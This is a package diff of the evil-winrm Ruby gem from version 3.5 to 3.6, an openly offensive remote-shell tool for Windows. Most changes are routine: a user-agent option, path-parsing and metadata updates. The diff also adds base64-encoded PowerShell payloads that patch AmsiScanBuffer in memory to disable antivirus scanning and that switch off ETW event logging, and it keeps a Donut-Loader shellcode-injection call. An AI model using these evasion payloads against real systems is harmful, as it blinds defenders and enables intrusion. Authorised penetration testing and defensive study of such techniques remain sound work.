evil-winrm 3.5 → 3.6
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/evil-winrm.rb +33 -15
- metadata +7 -7
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA256:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: 11cbf4c87fb485b3e75bba373489df758d42cb83e2f4241ac2050d49d47855cd
|
4
|
+
data.tar.gz: dc27a65532ba270c3fe759f24596182f69964b38f3121f02b5012ffe1603b6ee
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: 3da2f100a245cbcfe9a14a50b72ccb900722204517d6db37abbb98cc90b48566abf4a7f4eff42d5a58f950e3ee9dc798fdeedb1af80678fe0310b62d7daa604f
|
7
|
+
data.tar.gz: 94ff2e006ad6328cfc12975b7d79000dfb376c1bed5c0db90e85d45bb041941f8290ce7611ab817bcbc37b6fefcdc3e4432295f79f73ef62a03cac794b2efb56
|
data/evil-winrm.rb
CHANGED
@@ -17,11 +17,12 @@ require 'io/console'
|
|
17
17
|
require 'time'
|
18
18
|
require 'fileutils'
|
19
19
|
require 'logger'
|
20
|
+
require 'shellwords'
|
20
21
|
|
21
22
|
# Constants
|
22
23
|
|
23
24
|
# Version
|
24
|
-
VERSION = '3.
|
25
|
+
VERSION = '3.6'
|
25
26
|
|
26
27
|
# Msg types
|
27
28
|
TYPE_INFO = 0
|
@@ -56,6 +57,7 @@ $password = ''
|
|
56
57
|
$url = 'wsman'
|
57
58
|
$default_service = 'HTTP'
|
58
59
|
$full_logging_path = "#{Dir.home}/evil-winrm-logs"
|
60
|
+
$user_agent = "Microsoft WinRM Client"
|
59
61
|
|
60
62
|
# Redefine download method from winrm-fs
|
61
63
|
module WinRM
|
@@ -64,7 +66,7 @@ module WinRM
|
|
64
66
|
def download(remote_path, local_path, chunk_size = 1024 * 1024, first = true, size: -1)
|
65
67
|
@logger.debug("downloading: #{remote_path} -> #{local_path} #{chunk_size}")
|
66
68
|
index = 0
|
67
|
-
return download_dir(remote_path, local_path, chunk_size, false) if remote_path.match?(/(
|
69
|
+
return download_dir(remote_path, local_path, chunk_size, false) if remote_path.match?(/(\*\.?|\*\*|\.?\*|\*)/)
|
68
70
|
output = _output_from_file(remote_path, chunk_size, index)
|
69
71
|
return download_dir(remote_path, local_path, chunk_size, true) if output.exitcode == 2
|
70
72
|
return false if output.exitcode >= 1
|
@@ -89,7 +91,7 @@ module WinRM
|
|
89
91
|
end
|
90
92
|
|
91
93
|
def download_dir(remote_path, local_path, chunk_size, first)
|
92
|
-
index_exp = remote_path.index(/(
|
94
|
+
index_exp = remote_path.index(/(\*\.?|\*\*|\.?\*|\*)/) || 0
|
93
95
|
remote_file_path = remote_path
|
94
96
|
|
95
97
|
if index_exp > 0
|
@@ -155,13 +157,16 @@ class EvilWinRM
|
|
155
157
|
|
156
158
|
# Arguments
|
157
159
|
def arguments
|
158
|
-
options = { port: $port, url: $url, service: $service }
|
160
|
+
options = { port: $port, url: $url, service: $service, user_agent: $user_agent }
|
159
161
|
optparse = OptionParser.new do |opts|
|
160
|
-
opts.banner = 'Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l]'
|
162
|
+
opts.banner = 'Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-a USERAGENT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l]'
|
161
163
|
opts.on('-S', '--ssl', 'Enable ssl') do |_val|
|
162
164
|
$ssl = true
|
163
165
|
options[:port] = '5986'
|
164
166
|
end
|
167
|
+
opts.on('-a', '--user-agent USERAGENT', 'Specify connection user-agent (default Microsoft WinRM Client)') do |val|
|
168
|
+
options[:user_agent] = val
|
169
|
+
end
|
165
170
|
opts.on('-c', '--pub-key PUBLIC_KEY_PATH', 'Local path to public key certificate') do |val|
|
166
171
|
options[:pub_key] = val
|
167
172
|
end
|
@@ -253,6 +258,7 @@ class EvilWinRM
|
|
253
258
|
$priv_key = options[:priv_key]
|
254
259
|
$realm = options[:realm]
|
255
260
|
$service = options[:service]
|
261
|
+
$user_agent = options[:user_agent]
|
256
262
|
unless $log.nil?
|
257
263
|
|
258
264
|
FileUtils.mkdir_p $full_logging_path
|
@@ -289,7 +295,8 @@ class EvilWinRM
|
|
289
295
|
no_ssl_peer_verification: true,
|
290
296
|
transport: :ssl,
|
291
297
|
client_cert: $pub_key,
|
292
|
-
client_key: $priv_key
|
298
|
+
client_key: $priv_key,
|
299
|
+
user_agent: $user_agent
|
293
300
|
)
|
294
301
|
else
|
295
302
|
WinRM::Connection.new(
|
@@ -297,7 +304,8 @@ class EvilWinRM
|
|
297
304
|
user: $user,
|
298
305
|
password: $password,
|
299
306
|
no_ssl_peer_verification: true,
|
300
|
-
transport: :ssl
|
307
|
+
transport: :ssl,
|
308
|
+
user_agent: $user_agent
|
301
309
|
)
|
302
310
|
end
|
303
311
|
|
@@ -308,14 +316,16 @@ class EvilWinRM
|
|
308
316
|
password: '',
|
309
317
|
transport: :kerberos,
|
310
318
|
realm: $realm,
|
311
|
-
service: $service
|
319
|
+
service: $service,
|
320
|
+
user_agent: $user_agent
|
312
321
|
)
|
313
322
|
else
|
314
323
|
$conn = WinRM::Connection.new(
|
315
324
|
endpoint: "http://#{$host}:#{$port}/#{$url}",
|
316
325
|
user: $user,
|
317
326
|
password: $password,
|
318
|
-
no_ssl_peer_verification: true
|
327
|
+
no_ssl_peer_verification: true,
|
328
|
+
user_agent: $user_agent
|
319
329
|
)
|
320
330
|
end
|
321
331
|
end
|
@@ -379,10 +389,10 @@ class EvilWinRM
|
|
379
389
|
priv_key = priv_key.to_s
|
380
390
|
if $ssl
|
381
391
|
unless pub_key.empty? && priv_key.empty? then
|
382
|
-
unless [pub_key, priv_key].all? {|f| File.
|
383
|
-
print_message("Path to provided public certificate file \"#{pub_key}\" can't be found. Check filename or path", TYPE_ERROR, true, $logger) unless File.
|
392
|
+
unless [pub_key, priv_key].all? {|f| File.exist?(f) } then
|
393
|
+
print_message("Path to provided public certificate file \"#{pub_key}\" can't be found. Check filename or path", TYPE_ERROR, true, $logger) unless File.exist?(pub_key)
|
384
394
|
|
385
|
-
print_message("Path to provided private certificate file \"#{priv_key}\" can't be found. Check filename or path", TYPE_ERROR, true, $logger) unless File.
|
395
|
+
print_message("Path to provided private certificate file \"#{priv_key}\" can't be found. Check filename or path", TYPE_ERROR, true, $logger) unless File.exist?(priv_key)
|
386
396
|
|
387
397
|
custom_exit(1)
|
388
398
|
end
|
@@ -678,6 +688,7 @@ class EvilWinRM
|
|
678
688
|
dest = ""
|
679
689
|
source = ""
|
680
690
|
paths = get_paths_from_command(command, pwd)
|
691
|
+
|
681
692
|
if paths.length == 2
|
682
693
|
dest = paths.pop
|
683
694
|
source = paths.pop
|
@@ -759,6 +770,8 @@ class EvilWinRM
|
|
759
770
|
load_executable = File.binread(load_executable)
|
760
771
|
load_executable = Base64.strict_encode64(load_executable)
|
761
772
|
output = shell.run("Donut-Loader -process_id #{pid} -donutfile #{load_executable}")
|
773
|
+
else
|
774
|
+
output = shell.run("Donut-Loader")
|
762
775
|
end
|
763
776
|
print(output.output)
|
764
777
|
$logger&.info(output.output)
|
@@ -908,7 +921,7 @@ class EvilWinRM
|
|
908
921
|
end
|
909
922
|
|
910
923
|
def get_Bypass_4MSI
|
911
|
-
bypass_template = '
|
924
|
+
bypass_template = 'ZnVuY3Rpb24gTG9va3VwRnVuYyB7CiAgICBQYXJhbSAoJG1vZHVsZU5hbWUsICRmdW5jdGlvbk5hbWUpCiAgICAkYXNzZW0gPSAoW0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uR2V0QXNzZW1ibGllcygpIHwKICAgIFdoZXJlLU9iamVjdCB7ICRfLkdsb2JhbEFzc2VtYmx5Q2FjaGUgLUFuZCAkXy5Mb2NhdGlvbi5TcGxpdCgnXFwnKVstMV0uCiAgICAgRXF1YWxzKCdTeXN0ZW0uZGxsJykKICAgICB9KS5HZXRUeXBlKCdNaWNyb3NvZnQuV2luMzIuVW5zYWZlTmF0aXZlTWV0aG9kcycpCiAgICAkdG1wPUAoKQogICAgJGFzc2VtLkdldE1ldGhvZHMoKSB8IEZvckVhY2gtT2JqZWN0IHtJZigkXy5OYW1lIC1saWtlICJHZSpQKm9jKmRkcmVzcyIpIHskdG1wKz0kX319CiAgICByZXR1cm4gJHRtcFswXS5JbnZva2UoJG51bGwsIEAoKCRhc3NlbS5HZXRNZXRob2QoJ0dldE1vZHVsZUhhbmRsZScpKS5JbnZva2UoJG51bGwsCkAoJG1vZHVsZU5hbWUpKSwgJGZ1bmN0aW9uTmFtZSkpCn0KI2p1bXAKCmZ1bmN0aW9uIGdldERlbGVnYXRlVHlwZSB7CiAgICBQYXJhbSAoCiAgICAgW1BhcmFtZXRlcihQb3NpdGlvbiA9IDAsIE1hbmRhdG9yeSA9ICRUcnVlKV0gW1R5cGVbXV0KICAgICAkZnVuYywgW1BhcmFtZXRlcihQb3NpdGlvbiA9IDEpXSBbVHlwZV0gJGRlbFR5cGUgPSBbVm9pZF0KICAgICkKICAgICR0eXBlID0gW0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uCiAgICBEZWZpbmVEeW5hbWljQXNzZW1ibHkoKE5ldy1PYmplY3QgU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHlOYW1lKCdSZWZsZWN0ZWREZWxlZ2F0ZScpKSwKW1N5c3RlbS5SZWZsZWN0aW9uLkVtaXQuQXNzZW1ibHlCdWlsZGVyQWNjZXNzXTo6UnVuKS4KICAgIERlZmluZUR5bmFtaWNNb2R1bGUoJ0luTWVtb3J5TW9kdWxlJywgJGZhbHNlKS4KICAgIERlZmluZVR5cGUoJ015RGVsZWdhdGVUeXBlJywgJ0NsYXNzLCBQdWJsaWMsIFNlYWxlZCwgQW5zaUNsYXNzLAogICAgQXV0b0NsYXNzJywgW1N5c3RlbS5NdWx0aWNhc3REZWxlZ2F0ZV0pCgogICR0eXBlLgogICAgRGVmaW5lQ29uc3RydWN0b3IoJ1JUU3BlY2lhbE5hbWUsIEhpZGVCeVNpZywgUHVibGljJywKW1N5c3RlbS5SZWZsZWN0aW9uLkNhbGxpbmdDb252ZW50aW9uc106OlN0YW5kYXJkLCAkZnVuYykuCiAgICAgU2V0SW1wbGVtZW50YXRpb25GbGFncygnUnVudGltZSwgTWFuYWdlZCcpCgogICR0eXBlLgogICAgRGVmaW5lTWV0aG9kKCdJbnZva2UnLCAnUHVibGljLCBIaWRlQnlTaWcsIE5ld1Nsb3QsIFZpcnR1YWwnLCAkZGVsVHlwZSwKJGZ1bmMpLiBTZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCdSdW50aW1lLCBNYW5hZ2VkJykKICAgIHJldHVybiAkdHlwZS5DcmVhdGVUeXBlKCkKfQojanVtcAoKJGE9IkEiCiRiPSJtc2lTIgokYz0iY2FuQiIKJGQ9InVmZmVyIgojanVtcApbSW50UHRyXSRmdW5jQWRkciA9IExvb2t1cEZ1bmMgYW1zaS5kbGwgKCRhKyRiKyRjKyRkKQojanVtcAokb2xkUHJvdGVjdGlvbkJ1ZmZlciA9IDAKI2p1bXAKJHZwPVtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OkdldERlbGVnYXRlRm9yRnVuY3Rpb25Qb2ludGVyKChMb29rdXBGdW5jIGtlcm5lbDMyLmRsbCBWaXJ0dWFsUHJvdGVjdCksIChnZXREZWxlZ2F0ZVR5cGUgQChbSW50UHRyXSwgW1VJbnQzMl0sIFtVSW50MzJdLCBbVUludDMyXS5NYWtlQnlSZWZUeXBlKCkpIChbQm9vbF0pKSkKI2p1bXAKJGEgPSAkdnAuSW52b2tlKCRmdW5jQWRkciwgMywgMHg0MCwgW3JlZl0kb2xkUHJvdGVjdGlvbkJ1ZmZlcikKI2p1bXAKJGJ1ZiA9IFtCeXRlW11dICgweGI4LDB4MzQsMHgxMiwweDA3LDB4ODAsMHg2NiwweGI4LDB4MzIsMHgwMCwweGIwLDB4NTcsMHhjMykKI2p1bXAKJGEgPSBbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpDb3B5KCRidWYsIDAsICRmdW5jQWRkciwgMTIpCiNqdW1wClJlbW92ZS1JdGVtIEZ1bmN0aW9uOmdldERlbGVnYXRlVHlwZQojanVtcApSZW1vdmUtSXRlbSBGdW5jdGlvbjpMb29rdXBGdW5jCgo='
|
912
925
|
dec_template = Base64.decode64(bypass_template)
|
913
926
|
result = dec_template.gsub('$var1', generate_random_type_string)
|
914
927
|
@bypass_amsi_words_random_case.each { |w| result.gsub!(w.to_s, random_case(w)) }
|
@@ -927,6 +940,12 @@ class EvilWinRM
|
|
927
940
|
output = shell.run(bypass)
|
928
941
|
if output.output.empty?
|
929
942
|
print_message('[+] Success!', TYPE_SUCCESS, false)
|
943
|
+
print_message('Patching ETW, please be patient ..', TYPE_INFO, true)
|
944
|
+
patch_etw = Base64.decode64("W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkV2l0aFBhcnRpYWxOYW1lKCdTeXN0ZW0uQ29yZScpLkdldFR5cGUoJ1N5c3RlbS5EaWFnbm9zdGljcy5FdmVudGluZy5FdmVudFByb3ZpZGVyJykuR2V0RmllbGQoJ21fZW5hYmxlZCcsJ05vblB1YmxpYyxJbnN0YW5jZScpLlNldFZhbHVlKFtSZWZdLkFzc2VtYmx5LkdldFR5cGUoJ1N5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uVHJhY2luZy5QU0V0d0xvZ1Byb3ZpZGVyJykuR2V0RmllbGQoJ2V0d1Byb3ZpZGVyJywnTm9uUHVibGljLFN0YXRpYycpLkdldFZhbHVlKCksMCkK")
|
945
|
+
output = shell.run(patch_etw)
|
946
|
+
print_message('[+] Success!', TYPE_SUCCESS, false)
|
947
|
+
output = shell.run("Remove-Item Function:getDelegateType")
|
948
|
+
output = shell.run ("Remove-Item Function:LookupFunc")
|
930
949
|
else
|
931
950
|
puts(output.output)
|
932
951
|
end
|
@@ -939,9 +958,8 @@ class EvilWinRM
|
|
939
958
|
end
|
940
959
|
|
941
960
|
def get_paths_from_command(command, pwd)
|
942
|
-
parts = command
|
961
|
+
parts = Shellwords.shellsplit(command)
|
943
962
|
parts.delete_at(0)
|
944
|
-
parts.each { |p| p.gsub!('"', '') }
|
945
963
|
return parts
|
946
964
|
end
|
947
965
|
|
metadata
CHANGED
@@ -1,17 +1,17 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: evil-winrm
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: '3.
|
4
|
+
version: '3.6'
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
7
|
- CyberVaca
|
8
8
|
- OscarAkaElvis
|
9
9
|
- Jarilaos
|
10
10
|
- Arale61
|
11
|
-
autorequire:
|
11
|
+
autorequire:
|
12
12
|
bindir: bin
|
13
13
|
cert_chain: []
|
14
|
-
date:
|
14
|
+
date: 2024-10-06 00:00:00.000000000 Z
|
15
15
|
dependencies:
|
16
16
|
- !ruby/object:Gem::Dependency
|
17
17
|
name: fileutils
|
@@ -70,7 +70,7 @@ dependencies:
|
|
70
70
|
version: '2.3'
|
71
71
|
- - ">="
|
72
72
|
- !ruby/object:Gem::Version
|
73
|
-
version: 2.3.
|
73
|
+
version: 2.3.7
|
74
74
|
type: :runtime
|
75
75
|
prerelease: false
|
76
76
|
version_requirements: !ruby/object:Gem::Requirement
|
@@ -80,7 +80,7 @@ dependencies:
|
|
80
80
|
version: '2.3'
|
81
81
|
- - ">="
|
82
82
|
- !ruby/object:Gem::Version
|
83
|
-
version: 2.3.
|
83
|
+
version: 2.3.7
|
84
84
|
- !ruby/object:Gem::Dependency
|
85
85
|
name: winrm-fs
|
86
86
|
requirement: !ruby/object:Gem::Requirement
|
@@ -151,8 +151,8 @@ required_rubygems_version: !ruby/object:Gem::Requirement
|
|
151
151
|
- !ruby/object:Gem::Version
|
152
152
|
version: '0'
|
153
153
|
requirements: []
|
154
|
-
rubygems_version: 3.
|
155
|
-
signing_key:
|
154
|
+
rubygems_version: 3.3.15
|
155
|
+
signing_key:
|
156
156
|
specification_version: 4
|
157
157
|
summary: Evil-WinRM
|
158
158
|
test_files: []
|